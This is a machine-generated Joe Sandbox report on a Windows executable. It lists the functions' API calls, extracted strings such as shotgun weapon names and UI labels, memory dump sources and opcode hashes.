Download Yara Rule

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DDF2B5
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DDF2D0
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DDF2E9
sqrt.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DDF307
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DDF407

Part of subcall function 00007FF735DEA9E8: AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF735DB2AC0), ref: 00007FF735DEA9F8

mouse_event.USER32 ref: 00007FF735DDF3A9

Part of subcall function 00007FF735DDE9C0: memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDE9F8

Part of subcall function 00007FF735DDE9C0: memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDEA98

Part of subcall function 00007FF735DDE9C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DDEAB6

Part of subcall function 00007FF735DDE9C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDEA75

Part of subcall function 00007FF735DEAF64: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF735DE9935,?,?,?,?,?,00007FF735DE7EA5), ref: 00007FF735DEAF7E

mouse_event.USER32 ref: 00007FF735DDF3C1

Strings

ChargeShotgun, xrefs: 00007FF735DDEEE3
PumpShotgun, xrefs: 00007FF735DDEE96
CombatShotgun, xrefs: 00007FF735DDEFC7
AutoShotgun, xrefs: 00007FF735DDEF7B
DragonBreathShotgun, xrefs: 00007FF735DDEF2F
DoubleBarrelShotgun, xrefs: 00007FF735DDEF55
LeverActionShotgun, xrefs: 00007FF735DDEF09
TacticalShotgun, xrefs: 00007FF735DDEEBC
SlugShotgun, xrefs: 00007FF735DDEFED
SingleShotgun, xrefs: 00007FF735DDEFA1

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemmovemouse_event$AcquireConcurrency::cancel_current_taskExclusiveLockmallocsqrt
String ID: AutoShotgun$ChargeShotgun$CombatShotgun$DoubleBarrelShotgun$DragonBreathShotgun$LeverActionShotgun$PumpShotgun$SingleShotgun$SlugShotgun$TacticalShotgun
API String ID: 2583424261-4283324268
Opcode ID: c8473d0f7ddf63f22d682195c9819569c5d8aa50c01e75bea5766a0d48eaff41
Instruction ID: bfb59c763285f2b57853ae153b26f724834268fc5ee8dad06df5affbc6c46e26
Opcode Fuzzy Hash: c8473d0f7ddf63f22d682195c9819569c5d8aa50c01e75bea5766a0d48eaff41
Instruction Fuzzy Hash: 5F021A22E29BC7A4E710EB34D8913F9A3A1FF95B94F905332E95C166A5DF3CA580D310

Function 00007FF735DBF8F0 Relevance: 26.0, APIs: 20, Instructions: 1048COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBF9B6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBF9D7
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBFAB1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBFADD
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBFB7A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBFC28
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBFC4B
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBFC75
memset.VCRUNTIME140 ref: 00007FF735DBFC8D
memset.VCRUNTIME140 ref: 00007FF735DBFC9B
memset.VCRUNTIME140 ref: 00007FF735DBFCA8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DC01C5
memset.VCRUNTIME140 ref: 00007FF735DC01DE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DC03BA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DC03DA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DC0833
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DC0854
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DC0875
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DC0414

Part of subcall function 00007FF735DC1180: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,00007FF735DC09B3), ref: 00007FF735DC11E3
Part of subcall function 00007FF735DC1180: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,00007FF735DC09B3), ref: 00007FF735DC1214

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DC09F5

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: free$malloc$memset
String ID:
API String ID: 1620901979-0
Opcode ID: e1ee8ee98bb23783a28880feee87ba09bfe001c88ea59f5335f5572ffde610ea
Instruction ID: 280b7b77dd72d0f03b55253f76cd90c22dc652a984b2f1301344f58ddda78775
Opcode Fuzzy Hash: e1ee8ee98bb23783a28880feee87ba09bfe001c88ea59f5335f5572ffde610ea
Instruction Fuzzy Hash: DDB2E032A147829AE754DF26E08066DB7B0FB48F88F448336DE8967794DF38E491DB50

Function 00007FF735DB5DF0 Relevance: 15.8, APIs: 10, Instructions: 830COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB5F2F
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB64C7
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB64F7
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB699A
memmove.VCRUNTIME140 ref: 00007FF735DB69BD
memmove.VCRUNTIME140 ref: 00007FF735DB69D8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB69F7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB6A1F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB6A57
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB6A7C

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: free$mallocmemmovesqrtf
String ID:
API String ID: 2108133213-0
Opcode ID: 4ef6fc20b4569a25c7c5efcfae1a44eaa4e018ef8b6f1b8e867ebb820ccd15f2
Instruction ID: 38e0574bef5d45a078c67bc37c2d842b13eaee6d802032f82689257462233a88
Opcode Fuzzy Hash: 4ef6fc20b4569a25c7c5efcfae1a44eaa4e018ef8b6f1b8e867ebb820ccd15f2
Instruction Fuzzy Hash: 32729D13E28BE845D7139B36508227AE7D1EF6EB84F19D732ED44A6662EB3CE441D700

Function 00007FF735DD2F10 Relevance: 15.3, APIs: 10, Instructions: 253COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF735DD2FB8
asin.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DD306E
atan2.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DD30A1

Part of subcall function 00007FF735DD1B70: DeviceIoControl.KERNEL32 ref: 00007FF735DD1BE1

sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DD31BB
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DD31C7
sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DD31D5
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DD31E6
sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DD31F3
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DD3200
tanf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DD32B6

Part of subcall function 00007FF735DE8040: DeviceIoControl.KERNEL32 ref: 00007FF735DE80F9

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: cosfsinf$ControlDevice$asinatan2memsettanf
String ID:
API String ID: 1330759842-0
Opcode ID: 9881525b51d2b45473f77a5a7116237475bbd077c05d9cc28d843ee098c6749c
Instruction ID: 45064a1e4c3ff0730c4bd95ebc569830c19a2ec3cffef4f8896a17905b4158ac
Opcode Fuzzy Hash: 9881525b51d2b45473f77a5a7116237475bbd077c05d9cc28d843ee098c6749c
Instruction Fuzzy Hash: 85D13A22D2CF8654E213EB3694422B6E364AF6F7D4F549332F94D35672EF38A1C29610

Function 00007FF735DB2A90 Relevance: 15.1, APIs: 10, Instructions: 149clipboardCOMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB2B14
OpenClipboard.USER32 ref: 00007FF735DB2B23

Part of subcall function 00007FF735DEA9E8: AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF735DB2AC0), ref: 00007FF735DEA9F8

GetClipboardData.USER32 ref: 00007FF735DB2B3F
CloseClipboard.USER32 ref: 00007FF735DB2B4D

Part of subcall function 00007FF735DEA97C: AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF735DB2AEF), ref: 00007FF735DEA98C
Part of subcall function 00007FF735DEA97C: ReleaseSRWLockExclusive.KERNEL32(?,?,?,00007FF735DB2AEF), ref: 00007FF735DEA9CC

GlobalLock.KERNEL32 ref: 00007FF735DB2B68
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB2C35
memmove.VCRUNTIME140 ref: 00007FF735DB2C54
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB2C77
GlobalUnlock.KERNEL32 ref: 00007FF735DB2CB6
CloseClipboard.USER32 ref: 00007FF735DB2CBC

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: ClipboardLock$Exclusive$AcquireCloseGlobalfree$DataOpenReleaseUnlockmallocmemmove
String ID:
API String ID: 4281195603-0
Opcode ID: 6b2921db98ba7c6d43f433a8bfbd634b7c9f85a1e20594f9cdbe628148eb6379
Instruction ID: 0ceab38d3006e5f395ef45710ce1176776333f4ba70b097364a5c8481b1831e4
Opcode Fuzzy Hash: 6b2921db98ba7c6d43f433a8bfbd634b7c9f85a1e20594f9cdbe628148eb6379
Instruction Fuzzy Hash: 63517431A1E603A1FA54BB15E9D0275A3A1FF44F81FC44435D94E877A4DF3DE581A360

Function 00007FF735DCA160 Relevance: 14.2, APIs: 5, Strings: 1, Instructions: 3667stringCOMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF735DCA7AD
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF735DCC0F9
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DCC21D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DCC36B
fmodf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCD5CB

Strings

#SCROLLY, xrefs: 00007FF735DCA64C, 00007FF735DCCCC4

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: fmodffreemallocmemmovestrncpy
String ID: #SCROLLY
API String ID: 3140659168-1064663049
Opcode ID: cc9a8be1b09f683bf4ec16d276bd7ce63086c3276a4a0d325976cdee221a76eb
Instruction ID: 460159c92695a16916c013333d5dbc4bfecdd5a90381ee64bfb8d0c462e1c10d
Opcode Fuzzy Hash: cc9a8be1b09f683bf4ec16d276bd7ce63086c3276a4a0d325976cdee221a76eb
Instruction Fuzzy Hash: FE734B32E28387A6F711EA3684802BDB790EF19B84F954731DE99672A1DF39F440E750

Function 00007FF735DD9C40 Relevance: 14.0, APIs: 9, Instructions: 476COMMON

Download Yara Rule

APIs

__stdio_common_vsnprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DD9CDC
MultiByteToWideChar.KERNEL32 ref: 00007FF735DD9CFE
memset.VCRUNTIME140 ref: 00007FF735DD9D2C
MultiByteToWideChar.KERNEL32 ref: 00007FF735DD9D45

Part of subcall function 00007FF735DE7680: memmove.VCRUNTIME140(00000000,?,?,00007FF735DD2701), ref: 00007FF735DE76EA

WideCharToMultiByte.KERNEL32 ref: 00007FF735DD9D92
memset.VCRUNTIME140 ref: 00007FF735DD9DB3
WideCharToMultiByte.KERNEL32 ref: 00007FF735DD9DDA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9E48

Part of subcall function 00007FF735DC1A40: memchr.VCRUNTIME140 ref: 00007FF735DC1B96
Part of subcall function 00007FF735DC1A40: memchr.VCRUNTIME140 ref: 00007FF735DC1BF8

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DDA3F6

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: ByteCharMultiWide$_invalid_parameter_noinfo_noreturnmemchrmemset$__stdio_common_vsnprintf_smemmove
String ID:
API String ID: 864542015-0
Opcode ID: 11b9f2972749d4bb8e9afe2521042b875e02b3c1f8a575bda5bedb391a229a53
Instruction ID: ab8694ffacab12a590b466ed5ef8a1e4eecb138d592be78b65439bef68fd096e
Opcode Fuzzy Hash: 11b9f2972749d4bb8e9afe2521042b875e02b3c1f8a575bda5bedb391a229a53
Instruction Fuzzy Hash: 4622E533A28BC695E711DF75D4802A9B7A0FB98B94F449332EE8D27659DF38E180D710

Function 00007FF735DB97A0 Relevance: 12.3, APIs: 8, Instructions: 254COMMON

Download Yara Rule

APIs

sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB9892
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB98C0
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB98EF
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB991A
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB9B18
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB9B46
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB9B75
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB9BA0

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: sqrtf
String ID:
API String ID: 321154650-0
Opcode ID: a7adad535bd7471d93ec57ba27684531f34ed3adee84f5914d1640d4bec47caa
Instruction ID: 46cbbd60e151dde6f3aae4b39160a5782ffcaa9bf4ffb0f70cb1f2a4a468cfcf
Opcode Fuzzy Hash: a7adad535bd7471d93ec57ba27684531f34ed3adee84f5914d1640d4bec47caa
Instruction Fuzzy Hash: CAB1B322E38BCD50E223A63754C21F9E260AFBF7C5F2DDB23F984756B29B1461C16610

Function 00007FF735DB2CE0 Relevance: 12.1, APIs: 8, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00007FF735DB2CEB
GlobalAlloc.KERNEL32 ref: 00007FF735DB2D5E
GlobalLock.KERNEL32 ref: 00007FF735DB2D6F
GlobalUnlock.KERNEL32 ref: 00007FF735DB2DC1
EmptyClipboard.USER32 ref: 00007FF735DB2DC7
SetClipboardData.USER32 ref: 00007FF735DB2DD5
GlobalFree.KERNEL32 ref: 00007FF735DB2DE3
CloseClipboard.USER32 ref: 00007FF735DB2DE9

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
String ID:
API String ID: 453615576-0
Opcode ID: 149ae9741bd631a9e052683c4a4dc1564fe2eb0373ebb708d7a9a0031ebeafb6
Instruction ID: d317bb2eb4391ae5929b2c0d9b7b6c0b0f8a1aecef6a21a905e8f23253bd97e9
Opcode Fuzzy Hash: 149ae9741bd631a9e052683c4a4dc1564fe2eb0373ebb708d7a9a0031ebeafb6
Instruction Fuzzy Hash: 3A31D922B19643A2FB14BF11E89437AE3A2FF44FA0F884530DA8D47B94DE7CE4419790

Function 00007FF735DBC550 Relevance: 9.9, APIs: 6, Instructions: 873COMMON

Download Yara Rule

APIs

sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DBC75E
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DBC7F2
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DBC88C
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DBC918
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DBC9F7
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DBD26E

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: sqrtf
String ID:
API String ID: 321154650-0
Opcode ID: 53e937f76fa802f9a2fbd5659d7d97ef88ec443a31b64e0ae8af81f48bdbba85
Instruction ID: 330734b600ecc4824ccaff59a55e14bb04f77c34f8db8064baf7115ef8e4d3f2
Opcode Fuzzy Hash: 53e937f76fa802f9a2fbd5659d7d97ef88ec443a31b64e0ae8af81f48bdbba85
Instruction Fuzzy Hash: EF923C33A24B899AD712CF3784811ADB760FF6DB84719D716EA0827761DB34F1A5EB00

Function 00007FF735DBD470 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 419COMMON

Download Yara Rule

APIs

sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DBD66E
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DBD6E3
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DBD7CF

Strings

(, xrefs: 00007FF735DBD9EF

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: sqrtf
String ID: (
API String ID: 321154650-3887548279
Opcode ID: 8a7587682bf8e77970766eee19c9873103fcb7ac3d1be58dc4a40e3528555d8d
Instruction ID: 6533476be6a50fbf9f67344496b5de6d617739eea2c82302ec1859c7e4832b5b
Opcode Fuzzy Hash: 8a7587682bf8e77970766eee19c9873103fcb7ac3d1be58dc4a40e3528555d8d
Instruction Fuzzy Hash: 5B129733924BC995D312DF3784822ADB361FF6DB88B5AD722EA0933665DB34B191D700

Function 00007FF735DAB875 Relevance: 8.3, APIs: 1, Strings: 4, Instructions: 778COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF735DB3280: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB32B3
Part of subcall function 00007FF735DB3280: memmove.VCRUNTIME140 ref: 00007FF735DB32CF
Part of subcall function 00007FF735DB3280: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB32EF

memchr.VCRUNTIME140 ref: 00007FF735DAC0FE

Strings

#COLLAPSE, xrefs: 00007FF735DABC95
%*s%.*s, xrefs: 00007FF735DAC153
#CLOSE, xrefs: 00007FF735DABCFC
%.*s, xrefs: 00007FF735DAC12E

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: freemallocmemchrmemmove
String ID: %*s%.*s$ %.*s$#CLOSE$#COLLAPSE
API String ID: 837623554-4275869412
Opcode ID: f3fdd610339c870ffcb6d935aff851ddff91c481497ef150e6b16470cbd16cda
